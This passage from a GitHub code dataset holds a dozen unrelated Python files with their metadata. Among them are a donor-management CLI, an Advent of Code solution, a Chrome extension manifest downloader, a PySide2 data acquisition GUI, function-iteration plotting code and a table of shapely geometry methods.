self.t.write_back(data_item[\"id\"] + 1, 8,test_result)\n def tearDown(self) -> None:\n print(\"测试结束!\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ErvinChiu/guest3","sub_path":"api_demo.py","file_name":"api_demo.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"115649250","text":"##!/usr/bin/env python3\n\n#+----------------------------------------------+\n#| Mailroom Part 5 (Object Oriented) - Lesson 9 |\n#+----------------------------------------------+\n\n\nimport sys, os.path\n# import donor_models # data and model object go into that module - use explicit donor_models. namespace\nfrom donor_models import * # use implicit module namespace\n\n\n# current directory for file operations\ncur_dir = os.getcwd()\n\n\nprompt = \"\\n\".join((\"> Welcome to the donation Manager!\",\n \"Please choose from below options:\",\n \"1 - Send a Thank You\",\n \"2 - Print Report\", \n \"3 - Send letters to all Donors\",\n \"4 - Exit\",\n \">>> \"))\n\n# ======== Main functions ===============\n\ndef getmydir():\n return cur_dir\n\ndef safe_input(prompt = ''):\n try:\n result = input(prompt+\"\\n\")\n except (KeyboardInterrupt, EOFError):\n result = None\n return result\n\n\n# cli \ndef get_name(donors):\n\n np = \"> Enter new Donor's Full Name, type 'list' to see all Donors:\\n>>> \"\n name = safe_input(np) # input errors\n while name.lower() == \"list\":\n # create_report()\n # print_list()\n print(donors.list)\n name=safe_input(np) # input errors\n return(name.title())\n\n\n# cli\ndef get_amount(): # add error handling on not numbers, and input errors\n \n np = \"> Enter a Donation amount:\\n>>> \"\n try:\n amt = float(safe_input(np)) # input errors\n except (ValueError):\n print(\"Not valid amount\")\n amt = 0 \n \n while amt <= 0 :\n try:\n amt = float(safe_input(np)) # input errors\n except (ValueError):\n print(\"Not valid amount\")\n amt = 0 \n \n return(amt)\n\n\n# === Functions for the Main Menu\n\ndef send_thankyou(donors):\n new_name = get_name(donors)\n new_amount = get_amount()\n resstr = donors.add_donation(new_name, new_amount)\n print(resstr)\n\ndef create_report(donors): \n print(donors.report)\n \n\ndef send_letters(donors):\n print(donors.send_letters())\n\n# cli\ndef exit_program(donors):\n print(\"Good Bye...\")\n sys.exit(0)\n\n# cli\nmain_args = {\n 1: send_thankyou, # done\n 2: create_report, # done\n 3: send_letters,\n 4: exit_program} # done\n\n\n\ndef main_program(): # main loop\n # comment out before submission\n os.chdir(cur_dir) # change to my working directory\n \n # Create Donors and populate\n donors = DonorCollection()\n donors.add(Donor(\"Albert Einstein\", [1535.2, 15]))\n donors.add(Donor(\"Richard Feinman\", [150, 17]))\n donors.add(Donor(\"Lev Landau\", [53, 121, 35, 79]))\n donors.add(Donor(\"Niels Bohr\", [135.2, 15]))\n donors.add(Donor(\"Ilya Prigogine\", [15.2, 10]))\n \n # print(donors) # sanity check\n \n while True:\n try: # Error handling on range and input errors\n response = int(safe_input(prompt)) # continuously collect user selection\n except(ValueError):\n print(\"Input error!\") \n response = 0\n \n if response in main_args:\n main_args.get(response)(donors) # execute option from main_args passing the donors collection object as a parameter\n else:\n print(\"Not a valid option!\") \n \nif __name__ == \"__main__\":\n main_program()\n","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/stan_slov7/lesson09/cli_main.py","file_name":"cli_main.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"12816204490","text":"#FileNotFound\n# with open(\"a_file.txt\") as file:\n# fuile.read()\n\ntry:\n file = open(\"a_file.txt\")\n a_dictionary = {\"key\": \"value\"}\n # print(a_dictionary[\"sadf\"])\nexcept FileNotFoundError:\n open(\"a_file.txt\", \"w\")\n print(\"We did't find a_file.txt, creating one.\")\nexcept KeyError as error_message:\n print(\"The key {} does not exist\" .format(error_message))\nelse: \n content = file.read()\n print(content)\nfinally:\n file.close()\n print(\"file was closed\")\n\n# KeyError \n# a_dictionary = {\"key\":\"value\"}\n# value = a_dictionary[\"non_existent_key\"]\n\n# type KeyError\n# text = \"abc\"\n# print(text + 5)","repo_name":"Sanj-1873/100DaysOfPython","sub_path":"Day_21/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29581621447","text":"from utils import DataFiles\nimport collections\nimport numpy as np\n\ndataFiles = DataFiles(__file__)\n\ninput = dataFiles.input\ninputEX = dataFiles.inputEX\n\ninp = input[:]\n\nvents = [[[int(y) for y in x.split(\",\")] for x in ln.split(\" -> \")] for ln in inp]\n\nmap = collections.defaultdict(int)\n\nfor (x1, y1), (x2, y2) in vents:\n if (x1 == x2) or (y1 == y2):\n dx = x1 != x2\n dy = y1 != y2\n r = abs(x2 - x1) + abs(y2 - y1) + 1\n for k in range(r):\n map[min(x1, x2) + k * dx, min(y1, y2) + k * dy] += 1\n\nprint(\"Part 1:\", sum(1 for x in map.values() if x > 1))\n\nfor (x1, y1), (x2, y2) in vents:\n if (x1 != x2) and (y1 != y2):\n dx = np.sign(x2 - x1)\n dy = np.sign(y2 - y1)\n r = abs(x2 - x1) + 1\n for k in range(r):\n map[x1 + dx * k, y1 + dy * k] += 1\n\nprint(\"Part 2:\", sum(1 for x in map.values() if x > 1))\n","repo_name":"iulianxpopa/AdventOfCode","sub_path":"2021/code/Day05.py","file_name":"Day05.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13712084773","text":"#!/usr/bin/python3\nimport os\nimport sys\nimport json\nFILE = \"/usr/lib/zabbix/externalscripts/downdetectorlist.list\"\n\nif not os.path.isfile(FILE):\n print(\"File not found\")\n sys.exit()\n\nfile = open(FILE, \"r\")\n\ndata = {\n \"data\": []\n}\n\nfor line in file.readlines():\n line_data = line.rstrip().split(';')\n if line_data[0] == '1':\n dic = {\"{#SITE_ID}\": line_data[1], \"{#SITE_NOME}\": line_data[2]}\n data['data'].append(dic)\n\nprint(json.dumps(data))","repo_name":"gtkpad/downdetector_scrapper","sub_path":"downdetectorDiscovery.py","file_name":"downdetectorDiscovery.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} +{"seq_id":"14156488436","text":"\"\"\"\nThis module can be used to download (Chrome) extensions from the extension store.\n\"\"\"\nimport json\nimport os\n\nimport requests\nimport zipfile\n\nfrom extensionstores import GetExtensionInfoError\n\n\ndef get_extension_manifest(extension_id: str) -> dict:\n\t\"\"\"\n\tGet the extension manifest of a Chrome extension.\n\n\t:param extension_id: The id of the extension.\n\t:return: The manifest as dictionary.\n\t\"\"\"\n\tdirectory_name = \"results/downloaded_extensions/\"\n\tfile_path = download_chrome_extension(extension_id, directory_name)\n\treturn _extract_manifest_from_extension(file_path)\n\n\ndef download_chrome_extension(extension_id: str, download_directory: str) -> str:\n\t\"\"\"\n\tDownload the crx/zip file of a Chrome extension (if file does not exist yet).\n\n\t:param download_directory: Name of the directory to save the extension in.\n\t:param extension_id: The ID of the extension to download\n\t:return: Path to the downloaded file\n\t\"\"\"\n\tfile_path = f\"{download_directory}{extension_id}.zip\"\n\tif not os.path.exists(download_directory):\n\t\tos.mkdir(download_directory)\n\n\tif os.path.isfile(file_path):\n\t\treturn file_path\n\n\tdownload_url = f\"https://clients2.google.com/service/update2/crx?response=redirect&os=linux&arch=x86-64&os_arch=x86-64&nacl_arch=x86-64&prod=chromiumcrx&prodchannel=unknown&prodversion=52.0.2743.116&acceptformat=crx2,crx3&x=id%3D{extension_id}%26uc\"\n\tresponse = requests.get(download_url, timeout=20.0, stream=True)\n\tif response.status_code == 200:\n\t\twith open(file_path, \"wb\") as fd:\n\t\t\tfor chunk in response.iter_content(chunk_size=512):\n\t\t\t\tfd.write(chunk)\n\t\t\treturn file_path\n\telse:\n\t\traise GetExtensionInfoError(f\"Error: Cannot download crx file for extension {extension_id}\")\n\n\ndef _extract_manifest_from_extension(extension_path: str):\n\twith zipfile.ZipFile(extension_path, \"r\") as zip_ref:\n\t\tmanifest = zip_ref.read(\"manifest.json\")\n\t\treturn json.loads(manifest)\n","repo_name":"chrrel/extensions","sub_path":"analysis/extensiondownloader.py","file_name":"extensiondownloader.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"13789115297","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 30 00:58:48 2018\r\n\r\n@author: navi_\r\n\"\"\"\r\n\r\nimport nltk\r\nfrom split_articles import split_into_articles\r\nfrom condentropy import getSentences\r\nfrom write import writeList\r\n\r\ndef get_capital_letter_words(words):\r\n cap_let_word = ''\r\n for i in range(len(words)):\r\n if (' '.join(words[:i+1]).istitle() or ' '.join(words[:i+1]).isupper()) and words[i].isalnum():\r\n cap_let_word = ' '.join(words[:i+1])\r\n i += 1\r\n else:\r\n break\r\n if len(words[i:])<2:\r\n return [cap_let_word]\r\n else:\r\n return [cap_let_word] + get_capital_letter_words(words[i+1:])\r\n\r\nif __name__=='__main__':\r\n articles = split_into_articles('C:\\\\Users\\\\navi_\\\\Dropbox\\\\NLP\\\\Corpus\\\\e960401.htm')\r\n \r\n sentences = []\r\n \r\n for a in articles:\r\n sents = getSentences(a)\r\n for s in sents:\r\n sentences.append(s)\r\n\r\n cl_words = []\r\n for s in sentences:\r\n words = nltk.word_tokenize(s)\r\n cl_words = cl_words + get_capital_letter_words(words)\r\n cl_words = sorted(set(cl_words))\r\n \r\n writeList(cl_words, 'name_entity.txt')\r\n","repo_name":"IvanNolasco/Natural-Language-Processing","sub_path":"name_entity.py","file_name":"name_entity.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20239095080","text":"# 485. Max Consecutive Ones\n\n# Given a binary array nums, return the maximum number of consecutive 1's in the array.\n\n# Example 1:\n# Input: nums = [1,1,0,1,1,1]\n# Output: 3\n# Explanation: The first two digits or the last three digits are consecutive 1s. The maximum number of consecutive 1s is 3.\n\n# Example 2:\n# Input: nums = [1,0,1,1,0,1]\n# Output: 2\n\nfrom typing import List\n\n\nclass Solution:\n\n def findMaxConsecutiveOnes(self, nums: List[int]) -> int:\n res = 0\n slow = 0\n fast = slow\n while slow < len(nums):\n while fast < len(nums) and nums[fast] == 1:\n fast = fast + 1\n\n if fast - slow > res:\n res = fast - slow\n\n slow = slow + 1\n fast = slow\n\n return res\n\n\n# test\nsolution = Solution()\nres = solution.findMaxConsecutiveOnes([1, 1, 0, 1, 1, 1])\nprint(res)\n","repo_name":"HarryXiong24/code-collection","sub_path":"Data Structure & Algorithm/Algorithm/Two Point/en/Fast & Slow/485. Max Consecutive Ones/485. Max Consecutive Ones.py","file_name":"485. Max Consecutive Ones.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"32030823063","text":"from PySide2 import QtCore, QtGui\r\nfrom PySide2.QtCore import Signal, Slot, QTimer\r\nfrom PySide2.QtWidgets import QApplication, QMainWindow, QGridLayout, QComboBox, \\\r\n QTableWidget, QTableWidgetItem, QMenu, QMenuBar, QStatusBar, QAction, \\\r\n QFileDialog, QLineEdit, QPushButton, QCheckBox, QMessageBox, QVBoxLayout, \\\r\n QTabWidget, QHBoxLayout, QWidget, QHeaderView, QLabel, QDialog\r\nimport sys\r\nfrom EquipmentHandler import EquipmentHandler\r\nfrom configparser import ConfigParser\r\nimport pyqtgraph as pg\r\n\r\nclass MainWindow(QMainWindow):\r\n def __init__(self, config_file):\r\n super(MainWindow, self).__init__()\r\n self.config_file = config_file\r\n\r\n self.setObjectName(\"MainWindow\")\r\n self.setWindowTitle(\"Data Acquisition System V1\")\r\n self.resize(1024, 1024)\r\n self.centralwidget = QWidget(self)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.gridLayout = QGridLayout(self.centralwidget)\r\n self.gridLayout.setObjectName(\"gridLayout\")\r\n self.gridLayout.setSpacing(10)\r\n self.dataPlot = pg.PlotWidget(self.centralwidget)\r\n self.dataPlot.setObjectName(\"dataPlot\")\r\n # self.dataPlot.setGeometry(0, 0, 1024, 600)\r\n self.dataPlot.resize(1420,820)\r\n self.gridLayout.addWidget(self.dataPlot, 0, 0)\r\n\r\n\r\n self.tab_widget = QTabWidget()\r\n self.setCentralWidget(self.tab_widget)\r\n self.tab_widget.setTabPosition(QTabWidget.North)\r\n # self.tab_widget.setMovable(True)\r\n self.gridLayout.addWidget(self.tab_widget, 1, 0)\r\n\r\n # Read the configuration file\r\n self.config = ConfigParser()\r\n self.config.read(self.config_file)\r\n\r\n # Create a tab for each piece of equipment in the configuration file and initial it at the same time\r\n for section_name in self.config.sections():\r\n self.equipment_config = dict(self.config[section_name])\r\n # if self.equipment_config['function'] == \"daq\":\r\n # self.daq_device = EquipmentHandler(self.equipment_config, self.tab_widget)\r\n # else:\r\n self.equipment_tab = EquipmentHandler(self.equipment_config, self.tab_widget, self.dataPlot)\r\n self.tab_widget.addTab(self.equipment_tab, section_name) #self.equipment_config['name']) \r\n\r\n self.gridLayout.setRowStretch(0, 5)\r\n self.gridLayout.setRowStretch(1, 1)\r\n # self.gridLayout.setRowStretch(2, 1)\r\n # self.gridLayout.setRowStretch(3, 0)\r\n\r\n self.setCentralWidget(self.centralwidget)\r\n\r\n self.menubar = QMenuBar(self)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n self.menubar.setNativeMenuBar(False)\r\n self.menuFile = QMenu(self.menubar)\r\n self.menuFile.setObjectName(\"menuFile\")\r\n self.setMenuBar(self.menubar)\r\n self.statusbar = QStatusBar(self)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n self.setStatusBar(self.statusbar)\r\n self.actionSave = QAction(self)\r\n self.actionSave.setObjectName(\"actionSave\")\r\n self.menuFile.addAction(self.actionSave)\r\n self.menubar.addAction(self.menuFile.menuAction())\r\n \r\n # self.retranslateUi(self)\r\n QtCore.QMetaObject.connectSlotsByName(self)\r\n\r\n # def retranslateUi(self, MainWindow):\r\n # _translate = QtCore.QCoreApplication.translate\r\n # MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Data Acquisition System\"))\r\n # self.daqStartButton.setText(_translate(\"MainWindow\", \"Start\"))\r\n # self.daqConnectButton.setText(_translate(\"MainWindow\", \"Connect\"))\r\n # self.menuFile.setTitle(_translate(\"MainWindow\", \"File\"))\r\n # self.actionSave.setText(_translate(\"MainWindow\", \"Save\"))\r\n\r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n dataAcquisitionSystem = MainWindow(config_file='./equipment_config.ini')\r\n dataAcquisitionSystem.show()\r\n sys.exit(app.exec_())","repo_name":"sshbsshb/daqGui","sub_path":"mainUI.py","file_name":"mainUI.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9504152334","text":"#!/usr/bin/env python\n# encoding=utf-8\nimport requests\nimport re\nimport os\nimport datetime\npath = os.path.abspath(\".\")\ntemp_time = datetime.datetime.today().day\n\n\ndef get_backgroud_img():\n global temp_time\n now_day = datetime.datetime.today().day\n if temp_time == now_day:\n return\n print(\"抓取\")\n temp_time = now_day\n url = \"http://cn.bing.com\"\n html = requests.get(url).content\n background_image = re.findall('g_img={url: \"(.+?)\"', html)\n if background_image:\n image_url = background_image[0]\n if image_url.startswith(\"//\"):\n image_url = \"http:\" + image_url\n else:\n image_url = url + image_url\n open(path + \"/templates/config_html/backgroudUrl.html\",\n 'w').write(image_url)\n else:\n pass\n\n\nif __name__ == \"__main__\":\n get_backgroud_img()\n","repo_name":"2008820/flask_blog","sub_path":"app/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38821195437","text":"\"\"\"iterate functions\r\n By: Nathan Flack\r\n Version: 1.3\r\n\"\"\"\r\nfrom __future__ import division\r\n\r\nimport decimal\r\nimport pprint as pp\r\nimport traceback\r\nfrom decimal import Decimal as D\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sympy import UnevaluatedExpr as uv\r\nfrom sympy import *\r\n\r\nSEED = 100\r\n\r\nx, y, z, t = symbols('x y z t')\r\nk, m, n = symbols('k m n', integer=True)\r\nf, g, h = symbols('f g h', cls=Function)\r\n\r\n\r\ndef find_fixed_points(expression):\r\n try:\r\n fixed_points = solve(Eq(expression, x), x)\r\n except NotImplementedError as exc:\r\n # print(traceback.format_exc())\r\n print(exc)\r\n return []\r\n return fixed_points\r\n\r\ndef printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█', printEnd = \"\\r\"):\r\n \"\"\"\r\n from stack overflow\r\n Call in a loop to create terminal progress bar\r\n @params:\r\n iteration - Required : current iteration (Int)\r\n total - Required : total iterations (Int)\r\n prefix - Optional : prefix string (Str)\r\n suffix - Optional : suffix string (Str)\r\n decimals - Optional : positive number of decimals in percent complete (Int)\r\n length - Optional : character length of bar (Int)\r\n fill - Optional : bar fill character (Str)\r\n printEnd - Optional : end character (e.g. \"\\r\", \"\\r\\n\") (Str)\r\n \"\"\"\r\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\r\n filledLength = int(length * iteration // total)\r\n bar = fill * filledLength + '-' * (length - filledLength)\r\n print(f'\\r{prefix} |{bar}| {percent}% {suffix}', end = printEnd)\r\n # Print New Line on Complete\r\n if iteration == total: \r\n print()\r\n\r\n\r\ndef iterate_expression(expression, value, precision, max_iterations=100000):\r\n \"\"\"iterates over a function with the initial value and returns \r\n the list of iterated values\r\n\r\n Args:\r\n expression (SymPy object)): function of x to be iterated\r\n value (float): initial value\r\n precision (int): decimal precision\r\n max_iterations (int): amount of iterations\r\n\r\n Returns:\r\n list: list of iterated values\r\n \"\"\"\r\n iterating_value = expression.subs(x, value)\r\n last_iterating_value = iterating_value + 1\r\n iterate_list = [value, iterating_value]\r\n count = 0\r\n\r\n while abs(last_iterating_value - iterating_value) > 10**(-1*precision) and count < max_iterations:\r\n last_iterating_value = iterating_value\r\n iterating_value = round(expression.subs(x, iterating_value), 14)\r\n if iterating_value < 1e200 and iterating_value > -1e200:\r\n iterate_list.append(iterating_value)\r\n else:\r\n break\r\n count += 1\r\n return iterate_list\r\n\r\n\r\ndef lab_iterate_expression(expression, value, precision):\r\n \"\"\"iterates over a function with the initial value and returns \r\n the list of iterated values\r\n\r\n Args:\r\n expression (SymPy object)): function of x to be iterated\r\n value (float): initial value\r\n precision (int): amount of iterations\r\n\r\n Returns:\r\n list: list of iterated values\r\n \"\"\"\r\n fixed_points = find_fixed_points(expression)\r\n result = expression.subs(x, value)\r\n iterate_list = [value, result]\r\n\r\n iterating_value = value\r\n last_iterating_value = iterating_value + 1\r\n count = 0\r\n\r\n while abs(last_iterating_value - iterating_value) > 10**(-1*precision) and iterating_value not in fixed_points and count < 100000:\r\n last_iterating_value = iterating_value\r\n iterating_value = expression.subs(x, iterating_value)\r\n if int(iterating_value) < 1e200 and int(iterating_value) > -1e200:\r\n iterate_list.append(iterating_value)\r\n else:\r\n break\r\n count += 1\r\n return iterate_list\r\n\r\n\r\ndef calculate_square(value, seed, precision):\r\n try:\r\n if value == 0:\r\n raise ZeroDivisionError\r\n success = True\r\n w = seed\r\n graph1 = []\r\n graph1.append(w)\r\n last_w = w + 1\r\n count = 0\r\n\r\n while round(last_w - w, precision + 1) != 0 and count < 100:\r\n if w == 0:\r\n raise ZeroDivisionError\r\n if count > 98:\r\n success = False\r\n last_w = w\r\n w = w - (w**2 - value)/(2*w)\r\n graph1.append(w)\r\n count += 1\r\n return success, graph1\r\n except ZeroDivisionError as err:\r\n print('F\\'(x) is 0:', err)\r\n\r\n\r\ndef iterate_over_range(expression, max):\r\n iterate_dict = {}\r\n for item in np.arange(-1*max - 1, max + 1, .0001):\r\n iterate_list = iterate_expression(\r\n expression, item, 20)\r\n iterate_dict[item] = iterate_list[-1]\r\n return iterate_dict\r\n\r\n\r\ndef plot_graph_helper(graph_list, title, xlabel, ylabel, window_name, is_logarithm=False, has_grid = False, success=True):\r\n \"\"\"takes a list and plots it out. takes arguments that are used in displaying the graph\r\n\r\n Args:\r\n graph_list (list): list of numbers used as the y values in the graph\r\n title (string): [description]\r\n xlabel (string): [description]\r\n ylabel (string): [description]\r\n window_name (string): [description]\r\n is_logarithm (bool, optional): whether to use the log scale on the y graph. Defaults to False.\r\n has_grid (bool, optional): displays red grid lines. Defaults to False.\r\n success (bool, optional): [description]. Defaults to True.\r\n \"\"\"\r\n font1 = {'family': 'serif', 'color': 'blue', 'size': 20}\r\n font2 = {'family': 'serif', 'color': 'darkred', 'size': 15}\r\n fig, ax = plt.subplots(num=window_name)\r\n \r\n if is_logarithm:\r\n ax.semilogy(range(0, len(graph_list)), graph_list)\r\n else:\r\n ax.plot(range(0, len(graph_list)), graph_list)\r\n \r\n plt.title(title, fontdict=font1)\r\n plt.xlabel(xlabel, fontdict=font2)\r\n plt.ylabel(ylabel, fontdict=font2)\r\n if has_grid:\r\n ax.grid(color='r', linestyle='-', linewidth=.5)\r\n\r\n if success:\r\n ax.text(.3, .7,\r\n f' Last Value: {float(graph_list[-1])}\\nSecond to Last: {float(graph_list[-2])}', transform=ax.transAxes)\r\n else:\r\n ax.text(int(len(graph_list)/2), 0.7*SEED, 'unable to calculate')\r\n\r\n\r\ndef plot_iterate_graph(precision, expression, value, is_logarithm=False, max_iterations=100000, has_grid=False):\r\n \"\"\"puts arguments into iterate() function then plots the resulting graph\r\n\r\n Args:\r\n precision (int): [description]\r\n expression (SymPy object): function of x to be iterated\r\n value (float): initial value\r\n range_amount (int): times that the function should be iterated\r\n logarithm (bool, optional): whether the y axis should be logarithmic. Defaults to False.\r\n\r\n Returns:\r\n list: graphed list\r\n \"\"\"\r\n graph_list = iterate_expression(\r\n expression, value, precision, max_iterations)\r\n\r\n plot_graph_helper(graph_list,\r\n f'F(x) = {expression}, x0 = {value}', \"Iterations\", \"Value\", f'Iteration of F(x) = {expression}, x0 = {value}', is_logarithm, has_grid)\r\n return graph_list\r\n\r\n\r\ndef plot_square_graph(precision, value):\r\n success, graph_list = calculate_square(value, SEED, precision)\r\n plot_graph_helper(graph_list,\r\n \"Newton's Method\", \"Iterations\", \"Value\", 'Square of ' + str(value) +\r\n ' with precision of ' + str(precision))\r\n return graph_list\r\n\r\n\r\ndef find_basin_of_attraction(expression, seed, precision):\r\n \"\"\"finds the basin of attraction\r\n\r\n Args:\r\n expression (SymPy object): [description]\r\n seed (float): seed value\r\n precision (int): decimal precision\r\n\r\n Returns:\r\n list: list of iterated values\r\n \"\"\"\r\n try:\r\n fixed_points = find_fixed_points(expression)\r\n derivative = diff(expression, x)\r\n if seed == 0:\r\n raise ZeroDivisionError\r\n w = seed\r\n graph1 = []\r\n graph1.append(w)\r\n last_w = w + 1\r\n count = 0\r\n\r\n while round(last_w - w, precision + 1) != 0 and count < 100:\r\n if derivative.subs(x, w) == 0:\r\n raise ZeroDivisionError\r\n if count > 98:\r\n success = False\r\n last_w = w\r\n w = w - (expression.subs(x, w))/(derivative.subs(x, w))\r\n graph1.append(w)\r\n count += 1\r\n return graph1\r\n except ZeroDivisionError as err:\r\n print('F\\'(x) is 0:', err)\r\n\r\n\r\ndef plot_basin_graph(precision, expression, value, logarithm=False):\r\n \"\"\"puts arguments into find_basin_of_attraction() function then plots the resulting graph\r\n\r\n Args:\r\n precision (int): [description]\r\n expression (SymPy object): function of x\r\n value (float): seed value\r\n logarithm (bool, optional): whether the y axis should be logarithmic. Defaults to False.\r\n\r\n Returns:\r\n boolean: success\r\n list: graphed list\r\n \"\"\"\r\n success, graph_list = find_basin_of_attraction(\r\n expression, value, precision)\r\n\r\n plot_graph_helper(graph_list,\r\n f'F(x) = {expression}, x0 = {value}', \"Iterations\", \"Value\", f'Basin of attraction of F(x) = {expression}, seed = {value}', success, logarithm)\r\n return graph_list\r\n\r\n\r\ndef graph_cobweb(expression, initial_value, max_iterations, low_range, high_range):\r\n font1 = {'family': 'serif', 'color': 'blue', 'size': 20}\r\n font2 = {'family': 'serif', 'color': 'darkred', 'size': 15}\r\n graph_list = iterate_expression(\r\n expression, initial_value, 8, max_iterations)\r\n t = np.linspace(low_range, high_range, 100)\r\n values = list(map(lambda j: expression.subs(x, j), t))\r\n fig, ax = plt.subplots(num=f'Cobweb plot of F(x) = {expression}, x0 = {initial_value}')\r\n plt.title(f'F(x) = {expression}, x0 = {initial_value}', fontdict=font2)\r\n plt.xlabel('x', fontdict=font2)\r\n plt.ylabel('y', fontdict=font2)\r\n ax.plot(t, values)\r\n ax.plot(t, t)\r\n ax.plot([initial_value, initial_value], [\r\n initial_value, graph_list[1]], color='r')\r\n ax.plot([initial_value, graph_list[1]], [\r\n graph_list[1], graph_list[1]], color='r')\r\n for loop_controller in range(1, len(graph_list) - 1):\r\n ax.plot([graph_list[loop_controller], graph_list[loop_controller]], [\r\n graph_list[loop_controller], graph_list[loop_controller + 1]], color='r')\r\n ax.plot([graph_list[loop_controller], graph_list[loop_controller + 1]],\r\n [graph_list[loop_controller + 1], graph_list[loop_controller + 1]], color='r')\r\n\r\n\r\ndef main():\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"nathan416/nathan-spring-2022-homework","sub_path":"CPSC455-Chaos/transition_to_chaos/iterate.py","file_name":"iterate.py","file_ext":"py","file_size_in_byte":10834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38604712308","text":"import json\nfrom functools import lru_cache, cached_property\nfrom collections.abc import Sequence\n\nimport shapely.geometry as geom\nfrom shapely.geometry import shape, box\nfrom shapely import transform, GEOSException, make_valid\nimport numpy as np\n\nfrom mundipy.cache import pyproj_transform\nfrom mundipy.pcs import choose_pcs\n\n# Set bit = yes\n# Must we transform any coordinates at all to do this operation?\nTRANSFORM_INPUT = 1 << 0\n# Does this operation return a shapely base geometry?\n# this implies we transform the result back\nRETURN_GEO = 1 << 1\n\nSHAPELY_METHODS = {\n\t'__and__': 0,\n\t'__array_interface__': 0,\n\t'__bool__': 0,\n\t'__class__': 0,\n\t'__del__': 0,\n\t'__delattr__': 0,\n\t'__dict__': 0,\n\t'__dir__': 0,\n\t'__doc__': 0,\n\t'__eq__': 0,\n\t'__format__': 0,\n\t'__ge__': 0,\n\t'__geo_interface__': 0,\n\t'__geom__': 0,\n\t'__getattribute__': 0,\n\t'__getstate__': 0,\n\t'__gt__': 0,\n\t'__hash__': 0,\n\t'__init__': 0,\n\t'__init_subclass__': 0,\n\t'__le__': 0,\n\t'__lt__': 0,\n\t'__module__': 0,\n\t'__ne__': 0,\n\t'__new__': 0,\n\t'__nonzero__': 0,\n\t'__or__': 0,\n\t'__p__': 0,\n\t'__reduce__': 0,\n\t'__reduce_ex__': 0,\n\t'__repr__': 0,\n\t'__setattr__': 0,\n\t'__setstate__': 0,\n\t'__sizeof__': 0,\n\t'__str__': 0,\n\t'__sub__': 0,\n\t'__subclasshook__': 0,\n\t'__weakref__': 0,\n\t'__xor__': 0,\n\t'_array_interface_base': 0,\n\t'_crs': 0,\n\t'_ctypes': 0,\n\t'_ctypes_data': 0,\n\t'_empty': 0,\n\t'_geom': 0,\n\t'_get_coords': 0,\n\t'_is_empty': 0,\n\t'_lgeos': 0,\n\t'_ndim': 0,\n\t'_other_owned': 0,\n\t'_repr_svg_': 0,\n\t'_set_coords': 0,\n\t'_set_geom': 0,\n\t# Should be spatially invariant\n\t'almost_equals': 0,\n\t# Depends on the transformation but returns a float\n\t'area': TRANSFORM_INPUT,\n\t'array_interface_base': 0,\n\t# Don't think this needs to be projected\n\t'boundary': 0,\n\t'bounds': 0,\n\t# Does need projection because of units and distortion\n\t'buffer': TRANSFORM_INPUT | RETURN_GEO,\n\t# Centroid changes depending on location on the earth\n\t'centroid': TRANSFORM_INPUT | RETURN_GEO,\n\t# needs everything probably\n\t'convex_hull': TRANSFORM_INPUT | RETURN_GEO,\n\t# just give straight coordinates\n\t'coords': 0,\n\t# boolean ops\n\t# straight line on earth != projected straight line\n\t'contains': TRANSFORM_INPUT,\n\t'covered_by': TRANSFORM_INPUT,\n\t'covers': TRANSFORM_INPUT,\n\t'crosses': TRANSFORM_INPUT,\n\t'disjoint': TRANSFORM_INPUT,\n\t'intersects': TRANSFORM_INPUT,\n\t'overlaps': TRANSFORM_INPUT,\n\t'touches': TRANSFORM_INPUT,\n\t# idk\n\t'ctypes': 0,\n\t# needs all\n\t'difference': TRANSFORM_INPUT | RETURN_GEO,\n\t# needs projection returns float\n\t'distance': TRANSFORM_INPUT,\n\t# bool property\n\t'empty': 0,\n\t# needs all\n\t'envelope': TRANSFORM_INPUT | RETURN_GEO,\n\t# none needed because pointwise\n\t'equals': 0,\n\t'equals_exact': 0,\n\t'geom_type': 0,\n\t'geometryType': 0,\n\t'has_z': 0,\n\t# much like .distance()\n\t'hausdorff_distance': TRANSFORM_INPUT,\n\t# idk\n\t'impl': 0,\n\t# adds more points within a line, definitely needs this\n\t'interpolate': TRANSFORM_INPUT | RETURN_GEO,\n\t# needs all\n\t'intersection': TRANSFORM_INPUT | RETURN_GEO,\n\t# bool unnecessary\n\t'is_closed': 0,\n\t'is_empty': 0,\n\t'is_ring': 0,\n\t'is_simple': 